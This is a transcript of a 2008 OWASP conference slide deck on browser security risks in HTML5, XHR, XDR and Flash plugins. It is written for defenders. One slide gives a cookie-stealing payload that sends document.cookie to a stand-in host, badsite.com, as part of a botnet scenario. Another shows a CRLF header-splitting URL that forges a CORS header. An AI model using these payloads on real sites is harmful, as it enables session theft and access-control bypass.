Presentation is loading. Please wait.

Presentation is loading. Please wait.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Published byKristian Parsons Modified over 9 years ago

Similar presentations

Presentation on theme: "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."— Presentation transcript:

1 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP – Browser Security Roberto Suggi Liverani Security Consultant Security-Assessment.com 3 September 2008

2 OWASP Who am I?  Roberto Suggi Liverani  Security Consultant, CISSP - Security- Assessment.com  4+ years in information security, focusing on web application and network security  OWASP New Zealand founder/leader 2

3 OWASP Agenda  Introduction  A look to the present  The potential risks  Some challenges  HTML 5.0  WebApps (XHR)  Browser Plugins  OWASP approach to the problem  OWASP Intrinsic Group 3

4 OWASP Introduction  Present: web security focus is mainly on web apps rather than browsers  But: browser bugs affect much more users than web application bugs 4

5 OWASP Introduction  Browsers statistics from w3schools.com  JavaScript statistics 5

6 OWASP Introduction  The risks are not just in the numbers…  Do you remember “On the job browser exploitation” talk of Mark Piper?  Technologies evolve:  HTML5  XHR  Browser Plugin  Current browser security progress mainly focused on:  Reflected XSS filtering and CSRF protection  Phishing web sites detection 6

7 OWASP Next Challenges  HTML5 (W3C working draft)  New features with a security impact:  Origin-Policy  Browsing contexts and navigation  Custom protocol and content handlers  Structured client-side storage  Offline Web applications  Cross-document messaging  Server-sent events  Web sockets 7

8 OWASP HMTL5  Relaxing Origin-Policy:  Window objects origin-policy exceptions:  Location object  postMessage()  frames attribute  XXX4 method 8 y.hello.comx.hello.com XSS Injection document.domain = hello.com Communication between 2 subdomains through XSS

9 OWASP HTML5  Browsing Contexts and Navigations  Opener browsing context – 1.COM  Auxiliary Browser Context - 3.COM  Nested browser context - 2.COM 9 Malicious Third party 3.COM (b) Iframe injection src=2.COM 1.COM (vulnerable) Cross Context Scripting between 2.COM and 3.COM (a) Injection in 1.COM of document.open pointing to 3.COM

10 OWASP HTML5  Custom Protocol and content handlers  registerProtocolHandler() – ftp:, fax:, foo:  registerContentHandler() – MIME type, text/foo 10 A.COM B.COM navigator.registerCont entHandler(‘text/foo', ‘foo?url=%s', ‘foo') Download Test.foo served as text/foo redirection to: http://a.com/foo?url= b.com/test.foo

11 OWASP HTML5  Hijacking content or protocol handlers  navigator.registerProtocolHandler(‘HTTPS', ‘foo?url=%s', ‘foo')  Register Spamming  Site tries to register multiple protocol/content handlers  Multiple sites try registering video/mpeg content  Leaking Intranet URLs  User registers a certain content handler (text/foo)  User clicks http://192.168.0.32/hello.foo  User redirected to external site which handles text/foo  Leaking HTTPS  User redirected to site with HTTPS URL  Leaking credentials in GET Request 11

12 OWASP HTML5  Structured Client Storage  sessionStorage (adds data to the session for all pages under same domain)  localStorage (adds complex data to client’s cache)  Methods: getItem(), setItem()  Only protection: origin policy  SQL, yes SQL!!! – to store more structured data  Methods: openDatabase(), executeSQL()  Objects: SQLResultSet, SQLResultSetRowList, SQLError  More to come on “browser SQL injection”… 12

13 OWASP HTML5  Client Storage Attack Example (A. Trivero)  Browser SQL Injection Example (A. Trivero)  Cross-Directory Attack  XSS in www.geocities.com/user1 can read/write data from/to www.geocities.com/user2  User Tracking - UI put in client-storage in multiple sites (marketing, botnet, etc.)  Cookie Resurrection 13

14 OWASP HTML5  Offline Web Applications  Extensive Application Cache API  http://a.com/manifest  HTTP response with text/cache-manifest MIME type for manifest  Manifest specifies how specific site content should be cached = application cache policy  New items can be added to specific cached content with method add()  Different versions of cached content for the same site  Application Cache status can be queried:  Uncached, Idle, Checking, Download, Updateready 14

15 OWASP HTML5  Application Cache Poisoning  A.COM’s manifest allows caching of vulnerable HTML page containing DOM XSS  DOM XSS manipulates data when viewed in off-line mode  Attacking offline browser  Off-line application cache content with stored XSS that sets navigator.onLine=TRUE 15

16 OWASP HTML5  Cross Document Messaging  “While this (origin policy) is an important security feature, it prevents pages from different domains from communicating even when those pages are not hostile” – 7.4 W3C HTML5 current draft  postMessage(message, messagePort, targetOrigin) 16 window.addEventListener('message', receiver, false); function receiver(e) { if (e.origin == 'http://a.com') { if (e.data == 'Hello world') { e.source.postMessage('Hello', e.origin); } else { alert(e.data); } } } A.COM B.COM var o = document.getElementsByTagName('iframe')[0]; o.contentWindow.postMessage('Hello world', 'http://b.com/'); NOTE: this condition can be omitted or = *

17 OWASP HTML5  Server-Sent Events  Dispatching DOM events into document that expect it  RemoteEventTarget used to fetch data sent as EventStream (text/event-stream) from:  Same site  Allowed sites (XHR access control)  17 data: http://www.google.com/news/1\n data: http://www.yahoo/com/news/3\n data: http://bbc.co.uk/news/2\n EventStream PULLS

18 OWASP HTML5  Next generation web botnet – C&M interface 18 BOTNET badsite.com/ evil.php Stored XSS in botnet websites: Data Stream (MIME: text/event-stream) Data: wait();\n Data: document.write(<img src=‘http://badsite.com/’+document.cookie);\n Botnet operates following XHR access control for data exchange

19 OWASP HTML5  Web Sockets – websocket(url);  Botnet scenario applies as well 19 Client at 123.comServer at aa.com GET ws://aa.com/ HTTP/1.1 Upgrade: WebSocket Connection: Upgrade Host: 123.com Origin: http://123.com Authorization: Basic d2FsbGU6ZXZl HTTP/1.1 101 Web Socket Protocol Handshake Upgrade: WebSocket Connection: Upgrade WebSocket-Origin: http://aa.com WebSocket-Location: ws://aa.com:80/ Data Framing Read/send data byte per byte Data Framing Send/read raw UTF8 data byte per byte Close TCP/IP connection – no handshake

20 OWASP WebApps (XHR)  XHR Access Control (GET and POST) 20 Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open("GET or POST", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow- Origin: http://bbb.com Hello World! GET NOTE: the entire access control system relies on HTTP headers So what happens with an HTTP Splitting Attack? JavaScript + XHR: new client = new XMLHttpRequest(); client.open("GET or POST", "http://aaa.com/test.txt%0A%0DAcce ss-Control-Allow-Origin: http://bbb.com%0a%0d%0a%0d") client.onreadystatechange = function() { /* do something */ } client.send()

21 OWASP WebApps (XHR)  XHR Access Control (Other HTTP methods) 21 Resource: aaa.com/test.txt Client: bbb.com JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“OPTIONS", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() HTTP Response: Access-Control-Allow- Origin: http://bbb.com Access-Control-Max- Age: 3628800 Preflight Request: OPTIONS JavaScript + XHR: new client = new XMLHttpRequest(); client.open(“DELETE", "http://aaa.com/test.txt") client.onreadystatechange = function() { /* do something */ } client.send() DELETE NOTE: the entire access control system relies on HTTP headers

22 OWASP XHR Alternative – XDR (Xdomain Request)  Cross-domain request developed by Microsoft 22 Resource: aaa.com/xdr.txt Client: bbb.com JavaScript + XDR: xdr = new XDomainRequest(); xdr.open(“GET", “http://www.aaa.com/xdr.txt") HTTP Response: XDomainRequestAllo wed=1 Hello! GET HTTP Request: GET /xdr.txt XDomainRequest: 1 Host: bbb.com NOTE: the entire XDR relies on HTTP headers

23 OWASP Browser Plugins  Adobe Flash  LSO (Local Shared Objects)  Cookie system completely managed by Adobe  100KB cache data allowed by default  Third Party LSO are allowed by default (100kb cache)  LSO data stored and accessed “stealthily”  Typically stored in:  C:\Documents and Settings\[username]\Application Data\Macromedia\Flash Player  Files in the format.sol  This “feature” has already been exploited:  United Virtualies -> PIE (Persistent Identification Element)  Creates a unique ID for each browser and then stores in LSO 23

24 OWASP Browser Plugins  ActionScript FileReference.Download bypasses browser security settings  IKAT’s Paul Craig 0day technique to bypass kiosk software protection (IE’s security model)  Something like: 24 test.addEventListener(MouseEvent.CLICK, downloadFile); var fileRef:FileReference = new FileReference(); function downloadFile(event:MouseEvent):void { fileRef.download(new URLRequest("http://www.aaa.com/file.html"), “file.html"); }

25 OWASP OWASP Intrinsic Group  Aid browser vendors, framework vendors in addressing current security issues  Focus on:  HTML5 Working Group  XMLHTTPRequest  Webapp Working Group  Mozilla Firefox  Adobe (AIR/Flash)  Microsoft IE7  Microsoft.NET  Struts  Spring  Apache Commons  Soon: OWASP Top Ten Browser Security 25

26 OWASP Questions?  robertosl@owasp.org robertosl@owasp.org  http://malerisch.net http://malerisch.net  http://www.owasp.org/index.php/New_Zealand http://www.owasp.org/index.php/New_Zealand 26

27 OWASP References  HTML5  http://www.whatwg.org/specs/web-apps/current-work  XHR and XHR Level 2  https://wiki.mozilla.org/Cross_Site_XMLHttpRequest  http://dev.w3.org/2006/webapi/XMLHttpRequest-2  Access Controls XHR  http://www.w3.org/TR/access-control/  XDR  http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx  http://lists.w3.org/Archives/Public/public-appformats/2008Mar/0017.html  LSO  http://epic.org/privacy/cookies/flash.html  https://www.flashsec.org/wiki/Shared_Objects#Storage_location  http://www.macromedia.com/support/documentation/en/flashplayer/help/setting s_manager07.html  http://www.adobe.com/products/flashplayer/articles/lso/  http://en.wikipedia.org/wiki/Local_Shared_Object 27

28 OWASP References  HTML5 - Presentation  http://www.owasp.org/index.php/AppSecEU08_HTML5  Abusing HTML 5 Structured Client-side Storage  http://trivero.secdiscover.com/html5whitepaper.pdf  Web Stats  http://www.internetworldstats.com/stats.htm  Browser Stats  http://www.w3schools.com/browsers/browsers_stats.asp 28

Download ppt "Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Enabling Secure Internet Access with ISA Server

Enabling Secure Internet Access with ISA Server
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
Unit 11 Using the Internet & Browsing the Web.  Define the Internet and the Web  Set up & troubleshoot an Internet connection  Categorize webs sites.

Unit 11 Using the Internet & Browsing the Web.  Define the Internet and the Web  Set up & troubleshoot an Internet connection  Categorize webs sites.
Copyright © 2006 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike.
Talking to Yourself for Fun and Profit Lin-Shung Huang ∗, Eric Y. Chen ∗, Adam Barth †, Eric Rescorla ‡ and Collin Jackson ∗ ∗ Carnegie Mellon University.

Talking to Yourself for Fun and Profit Lin-Shung Huang ∗, Eric Y. Chen ∗, Adam Barth †, Eric Rescorla ‡ and Collin Jackson ∗ ∗ Carnegie Mellon University.
1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.

1 Configuring Internet- related services (April 22, 2015) © Abdou Illia, Spring 2015.
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Site and user security concerns for real time content serving Chris Mejia, IAB Sean Snider, Yahoo! Prabhakar Goyal, Microsoft.

Site and user security concerns for real time content serving Chris Mejia, IAB Sean Snider, Yahoo! Prabhakar Goyal, Microsoft.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.

1 Configuring Web services (Week 15, Monday 4/17/2006) © Abdou Illia, Spring 2006.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Web Same-Origin-Policy Lab Zutao Zhu 11/06/2009. Outline Background Setting SOP.

Web Same-Origin-Policy Lab Zutao Zhu 11/06/2009. Outline Background Setting SOP.
The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.

The OWASP Foundation Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under.
Introduction 2: Internet, Intranet, and Extranet J394 – Perancangan Situs Web Program Sudi Manajemen Universitas Bina Nusantara.

Introduction 2: Internet, Intranet, and Extranet J394 – Perancangan Situs Web Program Sudi Manajemen Universitas Bina Nusantara.
Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.

Happy Hacking HTML5! Group members: Dongyang Zhang Wei Liu Weizhou He Yutong Wei Yuxin Zhu.

Similar presentations

Ads by Google